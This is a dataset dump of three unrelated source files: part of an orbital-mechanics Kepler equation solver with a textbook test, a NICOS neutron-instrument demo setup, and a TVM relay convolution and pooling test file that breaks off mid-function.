''' Solve Kepler's Equation of the universal anomaly chi using the specified
numerical method. Applies Algorithm 3.4 from Orbital Mechanics for Engineering
Students, 4 ed, Curtis.
:param r_0: `iterable` (km) initial position 3-vector
:param v_0: `iterable` (km/s) initial velocity 3-vector
:param dt: `float` (s) time after initial state to solve for r, v as 3-vectors
:param body: `CelestialBody` (--) the celestial body to use for orbital parameters
:param method: `str` (--) which numerical method to use to solve Kepler's Equation
    :param tol: `float` (--) decimal tolerance for numerical method (default 1e-7 is roughly IEEE 754 single precision)
:param max_iters: `int` (--) maximum number of iterations in numerical method before breaking
:return: (km) final position 3-vector, (km/s) final velocity 3-vector
'''
VALID_METHODS = ('laguerre', 'newton')
mu = body.mu # (km**3/s**2) gravitational parameter of the specified primary body
r0 = np.linalg.norm(r_0) # (km) initial position magnitude
v0 = np.linalg.norm(v_0) # (km/s) initial velocity magnitude
vr0 = np.dot(v_0, r_0)/r0 # (km/s) initial radial velocity magnitude
alpha = 2/r0 - v0**2/mu # (1/km) inverse of semi-major axis
chi0 = np.sqrt(mu)*np.abs(alpha)*dt
if method not in VALID_METHODS:
print(f'Method \'{method}\' is not valid, must be one of {VALID_METHODS}.\nDefaulting to laguerre method.')
chi, _, _ = laguerre(chi0, kepler_chi, dkepler_dchi, d2kepler_dchi2, alpha, r0, vr0, mu, dt)
elif method == 'newton':
chi, _, _ = newton(chi0, kepler_chi, dkepler_dchi, alpha, r0, vr0, mu, dt)
else: # method == 'laguerre'
chi, _, _ = laguerre(chi0, kepler_chi, dkepler_dchi, d2kepler_dchi2, alpha, r0, vr0, mu, dt)
f = calc_f(chi, r0, alpha)
g = calc_g(dt, mu, chi, alpha)
r_1 = f*r_0 + g*v_0
r1 = np.linalg.norm(r_1)
fd = calc_fd(mu, r1, r0, alpha, chi)
gd = calc_gd(chi, r1, alpha)
v_1 = fd*r_0 + gd*v_0
return r_1, v_1
def solve_kepler_E(e, Me, tol=1e-7, max_iters=100):
''' Solve Kepler's Equation in the form containing Eccentric Anomaly (E),
eccentricity (e), and Mean Anomaly of Ellipse (Me). Uses Algorithm 3.1 from Orbital
Mechanics for Engineering Students, 4 ed, Curtis. '''
# TODO: have this function make use of one of the numerical methods in numerical.py
def f(E, e, Me):
return E - e*np.sin(E) - Me
def fp(E, e):
return 1 - e*np.cos(E)
E = Me + e/2 if Me < np.pi else Me - e/2
ratio = f(E, e, Me)/fp(E, e)
iters = 0
while abs(ratio) > tol and iters < max_iters:
E -= ratio
ratio = f(E, e, Me)/fp(E, e)
iters += 1
E -= ratio
converged = np.abs(ratio) <= tol
return E, iters, converged
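# A minimal usage sketch: for a circular orbit (e = 0) Kepler's equation reduces to E = Me,
# so the solver should return the mean anomaly unchanged:
#
#     E, iters, converged = solve_kepler_E(0.0, 1.2)
#     assert converged and abs(E - 1.2) < 1e-7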
def test():
''' Test the functionality of solve_kepler_chi
and solve_kepler_laguerre using Problem 3.20 from
Orbital Mechanics for Engineering Students, 4 ed, Curtis.
'''
# given starting information
Earth = BODIES['Earth'] # `CelestialBody` (--) Earth and all the Earth things
r_0 = np.array([20000, -105000, -19000]) # (km) initial position vector
v_0 = np.array([0.9, -3.4, -1.5]) # (km/s) initial velocity vector
dt = 2*60*60 # (s) time of interest after initial time
# given correct answer from textbook
correct_r_1 = np.array([26338, -128750, -29656]) # (km) final position vector
correct_v_1 = np.array([0.86280, -3.2116, -1.4613]) # (km/s) final velocity vector
# solve using above methods
r_n, v_n = solve_kepler_chi(r_0, v_0, dt, Earth, method='newton')
r_l, v_l = solve_kepler_chi(r_0, v_0, dt, Earth, method='laguerre')
# check correctness
# tolerance based on significant figures of given answers
newton_valid = np.allclose(r_n, correct_r_1, atol=1) and np.allclose(v_n, correct_v_1, atol=1e-4)
laguerre_valid = np.allclose(r_l, correct_r_1, atol=1) and np.allclose(v_l, correct_v_1, atol=1e-4)
return all([newton_valid, laguerre_valid])
if __name__ == '__main__':
print(test())
| 2.640625 | 3 |
nicos_demo/vpgaa/setups/pgai.py | jkrueger1/nicos | 12 | 1148 | description = 'PGAA setup with XYZOmega sample table'
group = 'basic'
sysconfig = dict(
datasinks = ['mcasink', 'chnsink', 'csvsink', 'livesink']
)
includes = [
'system',
'reactor',
'nl4b',
'pressure',
'sampletable',
'pilz',
'detector',
'collimation',
]
devices = dict(
mcasink = device('nicos_mlz.pgaa.devices.MCASink',
settypes = {'point'},
detectors = ['_60p', 'LEGe'],
),
chnsink = device('nicos_mlz.pgaa.devices.CHNSink',
settypes = {'point'},
detectors = ['_60p', 'LEGe'],
),
csvsink = device('nicos_mlz.pgaa.devices.CSVDataSink',
settypes = {'point'},
),
)
startupcode = """
SetDetectors('_60p', 'LEGe')
SetEnvironment(chamber_pressure)
printinfo("============================================================")
printinfo("Welcome to the NICOS PGAI demo setup.")
printinfo("============================================================")
"""
| 1.898438 | 2 |
tests/python/relay/test_op_level2.py | ravikumarvc/incubator-tvm | 3 | 1149 | <gh_stars>1-10
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
""" Support level2 operator test cases.
"""
import numpy as np
import tvm
from tvm import autotvm
from tvm import relay
from tvm.relay import transform
from tvm.relay.testing import ctx_list, run_infer_type
from tvm.contrib import util
import topi.testing
def test_conv1d_infer_type():
# symbolic in batch dimension
n, c, w = tvm.var("n"), 10, 224
x = relay.var("x", relay.ty.TensorType((n, c, w), "float32"))
w = relay.var("w")
y = relay.nn.conv1d(x, w,
kernel_size=3,
padding=(1, 1),
channels=2)
yy = run_infer_type(y)
assert yy.checked_type == relay.TensorType(
(n, 2, 224), "float32")
assert yy.args[1].checked_type == relay.TensorType(
(2, 10, 3), "float32")
# infer by shape of w, mixed precision
n, c, w = tvm.var("n"), 10, 224
x = relay.var("x", relay.TensorType((n, c, w), "int8"))
w = relay.var("w", relay.TensorType((2, 10, 3), "int8"))
y = relay.nn.conv1d(x, w, out_dtype="int32")
assert "out_dtype=\"int32\"" in y.astext()
yy = run_infer_type(y)
assert yy.checked_type == relay.TensorType(
(n, 2, 222), "int32")
# infer shape in case of different dtypes for input and weight.
n, c, w = tvm.var("n"), 10, 224
x = relay.var("x", relay.TensorType((n, c, w), "uint8"))
w = relay.var("w", relay.TensorType((2, 10, 3), "int8"))
y = relay.nn.conv1d(x, w, out_dtype="int32")
assert "out_dtype=\"int32\"" in y.astext()
yy = run_infer_type(y)
assert yy.checked_type == relay.TensorType(
(n, 2, 222), "int32")
# Infer with NWC
n, c, w = 4, 32, 224
x = relay.var("x", relay.TensorType((n, w, c), "int8"))
wt = relay.var("w")
y = relay.nn.conv1d(x, wt,
kernel_size=3,
padding=(1, 1),
channels=16,
data_layout="NWC",
out_dtype="int32")
yy = run_infer_type(y)
assert yy.checked_type == relay.TensorType(
(n, w, 16), "int32")
def test_conv1d_run():
def run_test_conv1d(dtype, out_dtype, scale, dshape, kshape,
padding=(1, 1),
fref=None,
dilation=1,
except_targets=None,
**attrs):
if except_targets is None:
except_targets = []
x = relay.var("x", shape=dshape, dtype=dtype)
w = relay.var("w", dtype=dtype)
y = relay.nn.conv1d(x, w,
padding=padding,
dilation=dilation,
**attrs)
func = relay.Function([x, w], y)
data = np.random.uniform(-scale, scale, size=dshape).astype(dtype)
kernel = np.random.uniform(-scale, scale, size=kshape).astype(dtype)
ref_res = topi.testing.conv1d_ncw_python(
data.astype(out_dtype), kernel.astype(out_dtype), 1, padding, dilation)
for target, ctx in ctx_list():
if target in except_targets:
continue
intrp1 = relay.create_executor("graph", ctx=ctx, target=target)
op_res1 = intrp1.evaluate(func)(data, kernel)
tvm.testing.assert_allclose(op_res1.asnumpy(), ref_res, rtol=1e-5, atol=1e-5)
# normal conv1d
dshape = (1, 3, 224)
kshape = (10, 3, 3)
run_test_conv1d("float32", "float32", 1, dshape, kshape,
padding=(1, 1), channels=10, kernel_size=3)
# mixed precision
run_test_conv1d("int8", "int32", 1, dshape, kshape,
padding=(1, 1), channels=10, kernel_size=3)
# dilated conv2d
dshape = (1, 3, 18)
kshape = (10, 3, 3)
run_test_conv1d("float32", "float32", 1, dshape, kshape,
padding=(1, 1), channels=10, kernel_size=3, dilation=3)
def test_conv2d_infer_type():
# symbolic in batch dimension
n, c, h, w = tvm.size_var("n"), 10, 224, 224
x = relay.var("x", relay.ty.TensorType((n, c, h, w), "float32"))
w = relay.var("w")
y = relay.nn.conv2d(x, w,
kernel_size=(3, 3),
padding=(1, 1),
channels=2)
yy = run_infer_type(y)
assert yy.checked_type == relay.TensorType(
(n, 2, 224, 224), "float32")
assert yy.args[1].checked_type == relay.TensorType(
(2, 10, 3, 3), "float32")
# infer by shape of w, mixed precision
n, c, h, w = tvm.size_var("n"), 10, 224, 224
x = relay.var("x", relay.TensorType((n, c, h, w), "int8"))
w = relay.var("w", relay.TensorType((2, 10, 3, 3), "int8"))
y = relay.nn.conv2d(x, w, out_dtype="int32")
assert "out_dtype=\"int32\"" in y.astext()
yy = run_infer_type(y)
assert yy.checked_type == relay.TensorType(
(n, 2, 222, 222), "int32")
# infer shape in case of different dtypes for input and weight.
n, c, h, w = tvm.size_var("n"), 10, 224, 224
x = relay.var("x", relay.TensorType((n, c, h, w), "uint8"))
w = relay.var("w", relay.TensorType((2, 10, 3, 3), "int8"))
y = relay.nn.conv2d(x, w, out_dtype="int32")
assert "out_dtype=\"int32\"" in y.astext()
yy = run_infer_type(y)
assert yy.checked_type == relay.TensorType(
(n, 2, 222, 222), "int32")
# Infer with a different layout
n, c, h, w = 4, 32, 224, 224
x = relay.var("x", relay.TensorType((n//4, c//4, h, w, 4, 4), "int8"))
wt = relay.var("w")
y = relay.nn.conv2d(x, wt,
kernel_size=(3, 3),
padding=(1, 1),
channels=16,
data_layout="NCHW4n4c",
kernel_layout="OIHW4o4i",
out_dtype="int32")
yy = run_infer_type(y)
assert yy.checked_type == relay.TensorType(
(1, 4, 224, 224, 4, 4), "int32")
assert yy.args[1].checked_type == relay.TensorType(
(4, 8, 3, 3, 4, 4), "int8")
# Infer with NHWC
n, c, h, w = 4, 32, 224, 224
x = relay.var("x", relay.TensorType((n, h, w, c), "int8"))
wt = relay.var("w")
y = relay.nn.conv2d(x, wt,
kernel_size=(3, 3),
padding=(1, 1),
channels=16,
data_layout="NHWC",
out_dtype="int32")
yy = run_infer_type(y)
assert yy.checked_type == relay.TensorType(
(n, h, w, 16), "int32")
def test_conv2d_run():
def run_test_conv2d(dtype, out_dtype, scale, dshape, kshape,
padding=(1, 1),
fref=None,
groups=1,
dilation=(1, 1),
except_targets=None,
**attrs):
if except_targets is None:
except_targets = []
x = relay.var("x", shape=dshape, dtype=dtype)
w = relay.var("w", dtype=dtype)
y = relay.nn.conv2d(x, w,
padding=padding,
dilation=dilation,
groups=groups,
**attrs)
func = relay.Function([x, w], y)
data = np.random.uniform(-scale, scale, size=dshape).astype(dtype)
kernel = np.random.uniform(-scale, scale, size=kshape).astype(dtype)
dkernel = topi.testing.dilate_python(kernel, (1, 1) + dilation)
if fref is None:
ref_res = topi.testing.conv2d_nchw_python(
data.astype(out_dtype), dkernel.astype(out_dtype), 1, padding,
groups=groups)
else:
ref_res = fref(data.astype(out_dtype), dkernel.astype(out_dtype))
for target, ctx in ctx_list():
if target in except_targets:
continue
intrp1 = relay.create_executor("graph", ctx=ctx, target=target)
op_res1 = intrp1.evaluate(func)(data, kernel)
tvm.testing.assert_allclose(op_res1.asnumpy(), ref_res, rtol=1e-5, atol=1e-5)
def compile_test_conv2d_arm_cpu(dtype, out_dtype, scale, dshape, kshape,
padding=(1, 1),
groups=1,
dilation=(1, 1),
**attrs):
x = relay.var("x", shape=dshape, dtype=dtype)
w = relay.var("w", dtype=dtype)
y = relay.nn.conv2d(x, w,
padding=padding,
dilation=dilation,
groups=groups,
**attrs)
func = relay.Function([x, w], y)
mod = tvm.relay.Module()
mod["main"] = func
test_schedule='{"i": ["llvm -device=arm_cpu", "topi_nn_depthwise_conv2d_nchw", \
[["TENSOR", [1, 512, 32, 32], "float32"], \
["TENSOR", [512, 1, 3, 3], "float32"], \
[1, 1], [1, 1], [1, 1], "float32"], {}, \
["depthwise_conv2d_nchw", [1, 512, 32, 32, "float32"], \
[512, 1, 3, 3, "float32"], [1, 1], [1, 1], [1, 1], "float32"], \
{"i": 743640, "t": "contrib_spatial_pack", "c": null, \
"e": [["tile_co", "sp", [32, 16]], ["tile_oh", "sp", [8, 1]], \
["tile_ow", "sp", [1, 8]], \
["reorder_0", "re", [0, 1, 2, 3, 4, 5, 8, 6, 7]], \
["reorder_1", "re", [0, 1, 2, 3, 6, 4, 5]], \
["ann_reduce", "an", ["unroll", "none"]], \
["ann_spatial", "an", ["unroll", "unroll", "vec"]], \
["data_pad_inline", "ot", 4], ["data_vec_inline", "ot", 1], \
["conv_inline", "ot", 0]]}], "r": [[0.0002933163], \
0, 3.1976189613342285, 1570811630.6058347], "v": 0.1}'
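        # test_schedule above is a single serialized AutoTVM tuning record; it is written to a
        # temporary log file so apply_history_best can hand relay.build the pre-tuned
        # contrib_spatial_pack schedule instead of falling back to an untuned one.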
temp = util.tempdir()
with open(temp.relpath("temp.log"), "w") as log_file:
log_file.write(test_schedule)
with autotvm.apply_history_best(temp.relpath("temp.log")):
with relay.build_config(opt_level=3):
print('Compiling...')
graph_json, mod, params = tvm.relay.build(mod, target="llvm -device=arm_cpu")
# depthwise conv2d
dshape = (1, 32, 18, 18)
kshape = (32, 1, 3, 3)
run_test_conv2d("float32", "float32", 1, dshape, kshape,
padding=(1, 1), channels=32, groups=32, kernel_size=(3 ,3),
fref=lambda x, w: topi.testing.depthwise_conv2d_python_nchw(
x, w, (1, 1), "SAME"))
# depthwise conv2d for arm_cpu
dshape = (1, 512, 32, 32)
kshape = (512, 1, 3, 3)
compile_test_conv2d_arm_cpu("float32", "float32", 1, dshape, kshape,
padding=(1, 1), channels=512,
groups=512, kernel_size=(3 ,3))
# CUDA is disabled for 'direct' schedule:
# https://github.com/apache/incubator-tvm/pull/3070#issuecomment-486597553
# group conv2d
dshape = (1, 32, 18, 18)
kshape = (32, 4, 3, 3)
run_test_conv2d("float32", "float32", 1, dshape, kshape,
padding=(1, 1), channels=32, groups=8, kernel_size=(3 ,3),
except_targets=['cuda'])
# also group conv2d
dshape = (1, 32, 18, 18)
kshape = (64, 1, 3, 3)
run_test_conv2d("float32", "float32", 1, dshape, kshape,
padding=(1, 1), channels=64, groups=32, kernel_size=(3 ,3),
except_targets=['cuda'])
# normal conv2d
dshape = (1, 3, 224, 224)
kshape = (10, 3, 3, 3)
run_test_conv2d("float32", "float32", 1, dshape, kshape,
padding=(1, 1), channels=10, kernel_size=(3 ,3))
# mixed precision
run_test_conv2d("int8", "int32", 1, dshape, kshape,
padding=(1, 1), channels=10, kernel_size=(3 ,3))
kshape = (10, 3, 1, 3)
# mixed precision.
run_test_conv2d("int8", "int32", 1, dshape, kshape,
padding=(0, 1), channels=10, kernel_size=(1 ,3))
# dilated conv2d
dshape = (1, 3, 18, 18)
kshape = (10, 3, 3, 3)
run_test_conv2d("float32", "float32", 1, dshape, kshape,
padding=(1, 1), channels=10, kernel_size=(3 ,3), dilation=(3, 3))
def test_conv2d_winograd():
class WinogradFallback(autotvm.FallbackContext):
def _query_inside(self, target, workload):
key = (target, workload)
if key in self.memory:
return self.memory[key]
cfg = autotvm.task.space.FallbackConfigEntity()
cfg.template_key = 'winograd'
cfg.is_fallback = False
cfg['tile_b'] = autotvm.task.space.SplitEntity([-1, 1, 1, 1])
cfg['tile_y'] = autotvm.task.space.SplitEntity([-1, 1, 1, 1])
cfg['tile_x'] = autotvm.task.space.SplitEntity([-1, 1, 1, 1])
cfg['tile_rc'] = autotvm.task.space.SplitEntity([-1, 1])
cfg['auto_unroll_max_setp'] = autotvm.task.space.OtherOptionEntity(1500)
cfg['unroll_explicit'] = autotvm.task.space.OtherOptionEntity(1)
self.memory[key] = cfg
return cfg
def run_test_conv2d_cuda(dtype, out_dtype, scale, dshape, kshape,
padding=(1, 1),
groups=1,
dilation=(1, 1),
**attrs):
x = relay.var("x", shape=dshape, dtype=dtype)
w = relay.var("w", shape=kshape, dtype=dtype)
y = relay.nn.conv2d(x, w,
padding=padding,
dilation=dilation,
groups=groups,
**attrs)
func = relay.Function([x, w], y)
mod = relay.Module()
mod['main'] = func
mod = relay.transform.InferType()(mod)
data = np.random.uniform(-scale, scale, size=dshape).astype(dtype)
kernel = np.random.uniform(-scale, scale, size=kshape).astype(dtype)
ref_res = topi.testing.conv2d_nchw_python(
data.astype(out_dtype), kernel.astype(out_dtype), 1, padding,
groups=groups)
with WinogradFallback(), relay.build_config(opt_level=3):
for target, ctx in ctx_list():
if target != 'cuda':
continue
params = {'w': tvm.nd.array(kernel)}
graph, lib, params = relay.build_module.build(mod, target=target, params=params)
module = tvm.contrib.graph_runtime.create(graph, lib, ctx)
module.set_input('x', tvm.nd.array(data))
module.set_input(**params)
module.run()
op_res1 = module.get_output(0)
tvm.testing.assert_allclose(op_res1.asnumpy(), ref_res, rtol=1e-3, atol=1e-3)
# normal winograd: stride 1, padding 1, kernel 3x3
dshape = (1, 80, 73, 73)
kshape = (192, 80, 3, 3)
run_test_conv2d_cuda("float32", "float32", 1, dshape, kshape,
padding=(1, 1), channels=192, kernel_size=(3, 3))
# extended winograd: stride 1, padding N, kernel 3x3
run_test_conv2d_cuda("float32", "float32", 1, dshape, kshape,
padding=(0, 0), channels=192, kernel_size=(3, 3))
run_test_conv2d_cuda("float32", "float32", 1, dshape, kshape,
padding=(2, 2), channels=192, kernel_size=(3, 3))
# extended winograd: stride 1, padding N, kernel NxN
kshape = (192, 80, 7, 7)
run_test_conv2d_cuda("float32", "float32", 1, dshape, kshape,
padding=(2, 2), channels=192, kernel_size=(7, 7))
def test_conv3d_infer_type():
# symbolic in batch dimension
n, c, d, h, w = tvm.size_var("n"), 10, 224, 224, 224
x = relay.var("x", relay.ty.TensorType((n, c, d, h, w), "float32"))
w = relay.var("w")
y = relay.nn.conv3d(x, w,
kernel_size=(3, 3, 3),
padding=(1, 1, 1),
channels=2)
yy = run_infer_type(y)
assert yy.checked_type == relay.TensorType(
(n, 2, 224, 224, 224), "float32")
assert yy.args[1].checked_type == relay.TensorType(
(2, 10, 3, 3, 3), "float32")
# infer by shape of w, mixed precision
n, c, d, h, w = tvm.size_var("n"), 10, 224, 224, 224
x = relay.var("x", relay.TensorType((n, c, d, h, w), "int8"))
w = relay.var("w", relay.TensorType((2, 10, 3, 3, 3), "int8"))
y = relay.nn.conv3d(x, w, out_dtype="int32")
assert "out_dtype=\"int32\"" in y.astext()
yy = run_infer_type(y)
assert yy.checked_type == relay.TensorType(
(n, 2, 222, 222, 222), "int32")
# infer shape in case of different dtypes for input and weight.
n, c, d, h, w = tvm.size_var("n"), 10, 224, 224, 224
x = relay.var("x", relay.TensorType((n, c, d, h, w), "uint8"))
w = relay.var("w", relay.TensorType((2, 10, 3, 3, 3), "int8"))
y = relay.nn.conv3d(x, w, out_dtype="int32")
assert "out_dtype=\"int32\"" in y.astext()
yy = run_infer_type(y)
assert yy.checked_type == relay.TensorType(
(n, 2, 222, 222, 222), "int32")
# Infer with NDHWC
n, c, d, h, w = 4, 32, 224, 224, 224
x = relay.var("x", relay.TensorType((n, d, h, w, c), "int8"))
wt = relay.var("w")
y = relay.nn.conv3d(x, wt,
kernel_size=(3, 3, 3),
padding=(1, 1, 1),
channels=16,
data_layout="NDHWC",
out_dtype="int32")
yy = run_infer_type(y)
assert yy.checked_type == relay.TensorType(
(n, d, h, w, 16), "int32")
def test_conv3d_run():
def run_test_conv3d(dtype, out_dtype, scale, dshape, kshape,
padding=(1, 1, 1),
fref=None,
groups=1,
dilation=(1, 1, 1),
except_targets=None,
**attrs):
if except_targets is None:
except_targets = []
x = relay.var("x", shape=dshape, dtype=dtype)
w = relay.var("w", dtype=dtype)
y = relay.nn.conv3d(x, w,
padding=padding,
dilation=dilation,
groups=groups,
**attrs)
func = relay.Function([x, w], y)
data = np.random.uniform(-scale, scale, size=dshape).astype(dtype)
kernel = np.random.uniform(-scale, scale, size=kshape).astype(dtype)
dkernel = topi.testing.dilate_python(kernel, (1, 1) + dilation)
if fref is None:
ref_res = topi.testing.conv3d_ncdhw_python(
data.astype(out_dtype), dkernel.astype(out_dtype), 1, padding,
groups=groups)
else:
ref_res = fref(data.astype(out_dtype), dkernel.astype(out_dtype))
for target, ctx in ctx_list():
if target in except_targets:
continue
intrp1 = relay.create_executor("graph", ctx=ctx, target=target)
op_res1 = intrp1.evaluate(func)(data, kernel)
tvm.testing.assert_allclose(op_res1.asnumpy(), ref_res, rtol=1e-5, atol=1e-5)
# normal conv3d
dshape = (1, 3, 5, 224, 224)
kshape = (10, 3, 3, 3, 3)
run_test_conv3d("float32", "float32", 1, dshape, kshape,
padding=(1, 1, 1), channels=10, kernel_size=(3, 3 ,3))
def test_conv3d_ndhwc_run():
def run_test_conv3d(dtype, out_dtype, scale, dshape, kshape,
padding=(1, 1, 1),
fref=None,
groups=1,
dilation=(1, 1, 1),
except_targets=None,
**attrs):
if except_targets is None:
except_targets = []
x = relay.var("x", shape=dshape, dtype=dtype)
w = relay.var("w", dtype=dtype)
y = relay.nn.conv3d(x, w,
padding=padding,
dilation=dilation,
groups=groups,
data_layout="NDHWC", kernel_layout="DHWIO",
**attrs)
func = relay.Function([x, w], y)
data = np.random.uniform(-scale, scale, size=dshape).astype(dtype)
kernel = np.random.uniform(-scale, scale, size=kshape).astype(dtype)
dkernel = topi.testing.dilate_python(kernel, (1, 1) + dilation)
if fref is None:
ref_res = topi.testing.conv3d_ndhwc_python(
data.astype(out_dtype), dkernel.astype(out_dtype), 1, padding)
else:
ref_res = fref(data.astype(out_dtype), dkernel.astype(out_dtype))
for target, ctx in ctx_list():
if target in except_targets:
continue
intrp1 = relay.create_executor("graph", ctx=ctx, target=target)
op_res1 = intrp1.evaluate(func)(data, kernel)
tvm.testing.assert_allclose(op_res1.asnumpy(), ref_res, rtol=1e-5, atol=1e-5)
# normal conv3d
dshape = (1, 5, 224, 224, 6)
kshape = (3, 3, 3, 6, 10)
run_test_conv3d("float32", "float32", 1, dshape, kshape,
padding=(1, 1, 1), channels=10, kernel_size=(3, 3 ,3), except_targets=["cuda"])
def test_conv2d_transpose_infer_type():
# symbolic in batch dimension
n, c, h, w = tvm.size_var("n"), 10, 10, 12
x = relay.var("x", relay.TensorType((n, c, h, w), "float32"))
w = relay.var("w", relay.IncompleteType())
y = relay.nn.conv2d_transpose(x, w,
kernel_size=(3, 3),
padding=(1, 1),
channels=15)
assert "channels=15" in y.astext()
yy = run_infer_type(y)
assert yy.checked_type == relay.TensorType(
(n, 15, 10, 12), "float32")
assert yy.args[1].checked_type == relay.TensorType(
(10, 15, 3, 3), "float32")
# infer by shape of w, mixed precision
n, h, w, c = tvm.size_var("n"), 10, 10, 12
x = relay.var("x", relay.TensorType((n, h, w, c), "float32"))
w = relay.var("w", relay.TensorType((12, 11, 5, 5), "float32"))
y = relay.nn.conv2d_transpose(x, w,
output_padding=(1, 1),
channels=11,
data_layout="NHWC")
yy = run_infer_type(y)
assert yy.checked_type == relay.TensorType(
(n, 15, 15, 11), "float32")
def test_conv2d_transpose_nchw_run():
dshape = (1, 3, 18, 18)
kshape = (3, 10, 3, 3)
oshape = (1, 10, 37, 37)
x = relay.var("x", shape=dshape)
w = relay.var("w")
y = relay.nn.conv2d_transpose(x, w,
channels=10, kernel_size=(3,3), strides=(2,2),
padding=(1,1), output_padding=(2, 2))
func = relay.Function([x, w], y)
dtype = "float32"
data = np.random.uniform(size=dshape).astype(dtype)
kernel = np.random.uniform(size=kshape).astype(dtype)
c_np = topi.testing.conv2d_transpose_nchw_python(
data, kernel, 2, 1)
d_np = np.zeros(shape=oshape)
d_np[:,:,0:c_np.shape[2],0:c_np.shape[3]] = c_np
ref_res = d_np
for target, ctx in ctx_list():
intrp1 = relay.create_executor("graph", ctx=ctx, target=target)
op_res1 = intrp1.evaluate(func)(data, kernel)
tvm.testing.assert_allclose(op_res1.asnumpy(), ref_res, rtol=1e-5, atol=1e-5)
def test_conv2d_transpose_nhwc_run():
dshape_nhwc = (1, 18, 18, 3)
kshape_hwoi = (3, 3, 10, 3)
oshape_nhwc = (1, 37, 37, 10)
x = relay.var("x", shape=dshape_nhwc)
w = relay.var("w")
# kshape and kernel_layout should have swapped IO.
# kshape is HWOI and kernel_layout is HWIO
y = relay.nn.conv2d_transpose(x, w,
channels=10, kernel_size=(3, 3), strides=(2, 2),
padding=(1, 1), output_padding=(2, 2),
data_layout="NHWC", kernel_layout="HWIO")
func = relay.Function([x, w], y)
dtype = "float32"
data = np.random.uniform(size=dshape_nhwc).astype(dtype)
kernel = np.random.uniform(size=kshape_hwoi).astype(dtype)
# use true kshape layout here - HWOI
c_np = topi.testing.conv2d_transpose_nhwc_python(data, kernel, 'HWOI', 2, 1)
d_np = np.zeros(shape=oshape_nhwc)
d_np[:,0:c_np.shape[1],0:c_np.shape[2],:] = c_np
def test_conv1d_transpose_ncw_run():
dshape = (1, 3, 18)
kshape = (3, 10, 3)
oshape = (1, 10, 37)
x = relay.var("x", shape=dshape)
w = relay.var("w")
y = relay.nn.conv1d_transpose(x, w,
channels=10, kernel_size=(3,), strides=(2,),
padding=(1,), output_padding=(2,))
func = relay.Function([x, w], y)
dtype = "float32"
data = np.random.uniform(size=dshape).astype(dtype)
kernel = np.random.uniform(size=kshape).astype(dtype)
c_np = topi.testing.conv1d_transpose_ncw_python(
data, kernel, 2, 1)
d_np = np.zeros(shape=oshape)
d_np[:,:,0:c_np.shape[2]] = c_np
ref_res = d_np
for target, ctx in ctx_list():
intrp1 = relay.create_executor("graph", ctx=ctx, target=target)
op_res1 = intrp1.evaluate(func)(data, kernel)
tvm.testing.assert_allclose(op_res1.asnumpy(), ref_res, rtol=1e-5, atol=1e-5)
def test_upsampling_infer_type():
n, c , h, w = tvm.size_var("n"), tvm.size_var("c"), tvm.size_var("h"), tvm.size_var("w")
scale = tvm.const(2.0, "float64")
x = relay.var("x", relay.TensorType((n, c, h, w), "float32"))
y = relay.nn.upsampling(x, scale_h=2, scale_w=2, layout="NCHW", method="bilinear")
"method=\"BINLINEAR\"" in y.astext()
yy = run_infer_type(y)
assert yy.checked_type == relay.TensorType((n, c, tvm.expr.Cast("int32", tvm.round(h*scale)),
tvm.expr.Cast("int32", tvm.round(w*scale))),
"float32")
n, c = tvm.size_var("n"), tvm.size_var("c")
x = relay.var("x", relay.TensorType((n, c, 100, 200), "float32"))
y = relay.nn.upsampling(x, scale_h=2, scale_w=2, layout="NCHW", method="bilinear")
yy = run_infer_type(y)
assert yy.checked_type == relay.TensorType((n, c, 200, 400), "float32")
def test_upsampling3d_infer_type():
n, c, d, h, w = tvm.size_var("n"), tvm.size_var("c"),\
tvm.size_var("d"), tvm.size_var("h"), tvm.size_var("w")
scale = tvm.const(2.0, "float64")
x = relay.var("x", relay.TensorType((n, c, d, h, w), "float32"))
y = relay.nn.upsampling3d(x, scale_d=2, scale_h=2, scale_w=2, layout="NCDHW", method="trilinear")
yy = run_infer_type(y)
assert yy.checked_type == relay.TensorType((n, c, tvm.expr.Cast("int32", tvm.round(d*scale)),
tvm.expr.Cast("int32", tvm.round(h*scale)),
tvm.expr.Cast("int32", tvm.round(w*scale))),
"float32")
n, c = tvm.size_var("n"), tvm.size_var("c")
x = relay.var("x", relay.TensorType((n, c, 100, 100, 200), "float32"))
y = relay.nn.upsampling3d(x, scale_d=2, scale_h=2, scale_w=2, layout="NCDHW", method="trilinear")
yy = run_infer_type(y)
assert yy.checked_type == relay.TensorType((n, c, 200, 200, 400), "float32")
def _test_pool2d(opfunc, reffunc):
n, c, h, w = tvm.size_var("n"), 10, 224, 224
x = relay.var("x", relay.TensorType((n, c, h, w), "float32"))
y = opfunc(x, pool_size=(1, 1))
assert "pool_size=" in y.astext()
yy = run_infer_type(y)
assert yy.checked_type == relay.TensorType((n, 10, 224, 224), "float32")
# test execution
dtype = "float32"
dshape = (1, 3, 28, 28)
x = relay.var("x", shape=dshape)
y = opfunc(x, pool_size=(2, 2), strides=(2, 2), padding=(0, 0))
func = relay.Function([x], y)
data = np.random.uniform(size=dshape).astype(dtype)
ref_res = reffunc(data.reshape(1, 3, 14, 2, 14, 2), axis=(3, 5))
for target, ctx in ctx_list():
intrp1 = relay.create_executor("graph", ctx=ctx, target=target)
op_res1 = intrp1.evaluate(func)(data)
tvm.testing.assert_allclose(op_res1.asnumpy(), ref_res, rtol=1e-5, atol=1e-5)
def _test_pool2d_int(opfunc, reffunc, dtype):
n, c, h, w = tvm.size_var("n"), 10, 224, 224
x = relay.var("x", relay.TensorType((n, c, h, w), dtype))
y = opfunc(x, pool_size=(1, 1))
assert "pool_size=" in y.astext()
yy = run_infer_type(y)
assert yy.checked_type == relay.TensorType((n, 10, 224, 224), dtype)
# test execution
dtype = "int32"
dshape = (1, 3, 28, 28)
x = relay.var("x", shape=dshape, dtype=dtype)
y = opfunc(x, pool_size=(2, 2), strides=(2, 2), padding=(0, 0))
func = relay.Function([x], y)
data = np.random.random_integers(low=-128, high=128, size=dshape)
ref_res = reffunc(data.reshape(1,3,14,2,14,2), axis=(3,5)).astype(dtype)
for target, ctx in ctx_list():
intrp1 = relay.create_executor("graph", ctx=ctx, target=target)
